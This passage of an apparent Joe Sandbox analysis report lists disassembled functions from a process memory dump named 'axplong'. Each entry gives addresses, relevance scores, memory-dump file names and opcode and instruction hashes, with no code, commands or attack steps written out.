                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: 82F16F71E002599FDF14CFA9C8806AEB7B5FF89314F258269E919EB345D730AE01CB90
                      Function 008BCB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,008BCE82,?,?,?,?,008BCEB7,?,?,?,?,?,?,008BC42D,?,00000001), ref: 008BCB33
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: c90778a775cf564e068909fcbf1e0b2e1e49801ad206d91e15532a3f8a0c64e9
                      • Instruction ID: 256037ced2c7933b9d0487d4b8fda530265b9cd8350c330bc4cfff8d1ca20c1b
                      • Opcode Fuzzy Hash: c90778a775cf564e068909fcbf1e0b2e1e49801ad206d91e15532a3f8a0c64e9
                      • Instruction Fuzzy Hash: F2D01232A9753C9BCA122BA4BC09CEDBB19FF45B743454111ED05A72208A616C419FE5
                      Function 008D7D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: 2cfd25ab588579a5e4fad753a9caeb66784b0edfc9675847ee33aa5bd8c21ea4
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: D951357020C7489ADB389A2C88967BEA79BFF51708F18076BD482D7782FA11DD458392
                      Function 008A4CF0 Relevance: .7, Instructions: 701COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4a19b0785404768001ca1441a23d4f10b17b7073fb3e5ca9bc335ffe8d499310
                      • Instruction ID: f0a0d31d96b37a7f8850103a4ce83e99d876556fff9f08e5a0f6a84302da4819
                      • Opcode Fuzzy Hash: 4a19b0785404768001ca1441a23d4f10b17b7073fb3e5ca9bc335ffe8d499310
                      • Instruction Fuzzy Hash: F8225FB3F515144BDB0CCA9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159A44
                      Function 008E6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dc225a63af5d62e998209e03364c278f159bac1d299d08fbe08f83f70692d8bc
                      • Instruction ID: 90a97358d91192b947c9b3f6f58fe27c5309e0b80109f654aaa87d173ad20821
                      • Opcode Fuzzy Hash: dc225a63af5d62e998209e03364c278f159bac1d299d08fbe08f83f70692d8bc
                      • Instruction Fuzzy Hash: A0B18B31214649CFD719CF29C486B657BE0FF46364F298658E89ACF2A1C736E992CB40
                      Function 00989680 Relevance: .2, Instructions: 190COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 738f397fd31e5b2ba27f4530648541c7191a35ab890a881f739cef5653ad4c2b
                      • Instruction ID: 8858ad13c6370f04476b89768506f37992b4a43900bfc2620a01d3d093f0be04
                      • Opcode Fuzzy Hash: 738f397fd31e5b2ba27f4530648541c7191a35ab890a881f739cef5653ad4c2b
                      • Instruction Fuzzy Hash: D261BDB3F6022547F3544D29CC983A27683DB95310F2F82788E5CAB7C5D97E5D0A5384
                      Function 008BD312 Relevance: .2, Instructions: 172COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 008A247E
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: 0ed53b1a8c228fc860d4c541f0e4a02cfd3b73b019799eb2d08dcf819b352178
                      • Instruction ID: 214aa40bcdd6bc5ee4de6de7e42b9af44593acdda0b1a2591c75db2582c0ca10
                      • Opcode Fuzzy Hash: 0ed53b1a8c228fc860d4c541f0e4a02cfd3b73b019799eb2d08dcf819b352178
                      • Instruction Fuzzy Hash: D95189B2A1470AAFDB15CF68D8856AABBF0FB08310F24866AD444EB351E7359940DF50
                      Function 008A4AF0 Relevance: .2, Instructions: 158COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b52d104480daa829cf4a2e88ebc6ea25d1309e171d3dfaee87976091cfccea87
                      • Instruction ID: 3d970e7b6fe1134e54abe1625cb2dc03e0c92abc8cf9ea88798b01201b8c36ae
                      • Opcode Fuzzy Hash: b52d104480daa829cf4a2e88ebc6ea25d1309e171d3dfaee87976091cfccea87
                      • Instruction Fuzzy Hash: F0518F716187918FD319CF29851523ABBE1FFD6300F084A9EE4E687292DB74D644CBA2
                      Function 008E777B Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 320c112fb0681ca7d9ae2d92c914dd2d5c8eab0366ed21ce38e69ed1c3560e57
                      • Instruction ID: 10b7aa24c20603de361527123dfbad915b75e6a40abefc01b73885a04fae23bb
                      • Opcode Fuzzy Hash: 320c112fb0681ca7d9ae2d92c914dd2d5c8eab0366ed21ce38e69ed1c3560e57
                      • Instruction Fuzzy Hash: 9B21B673F204394B770CC47E8C5727DB6E1C68C641745423AE8A6EA2C1D968D917E2E4
                      Function 008E765B Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 997b5540fb1e3c4b1c677f21047e416be82e96a5f9be5e53691f1740e1f881cc
                      • Instruction ID: f1a5f7884c7533c19db53df67ea7472ec5400c3b267d88adea7ffbdc659da7f8
                      • Opcode Fuzzy Hash: 997b5540fb1e3c4b1c677f21047e416be82e96a5f9be5e53691f1740e1f881cc
                      • Instruction Fuzzy Hash: 4111CA23F30C255B675C817D8C132BAA1D2EBD824434F433AD826EB384E994DE23D290
                      Function 008E8720 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 4fc720650e985d8ea32ef59e25efcd83611245d5a086a40867298e69b8e5b5f5
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 0011E67B2011C1C7D605862FCDF45BFAB96FAC7322B3C437AD05ACB658DA239945E900
                      Function 008D645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 91d4ef02490830bb2d5b8b7937a6f488796af2ea427461c392fc5ff37f3c084d
                      • Instruction ID: 894f178d4c9cc4f3f4d92f08ae3ec998bb2488773163b02275c321e25c280331
                      • Opcode Fuzzy Hash: 91d4ef02490830bb2d5b8b7937a6f488796af2ea427461c392fc5ff37f3c084d
                      • Instruction Fuzzy Hash: FFE08C3026160CAFCE257B18C80C9583B1BFF51350F104906FC0496362DB65EDA1D995
                      Function 008DA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: 8c602ce6d69638a3c06a1d12687267f55b4f563477a6fd0e839f958370c1707d
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 7CE0B672915228EBCB19DB9C894499AF3ACFB49B50F654697B502D3251C270DF00D7D1
                      Function 008B2E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
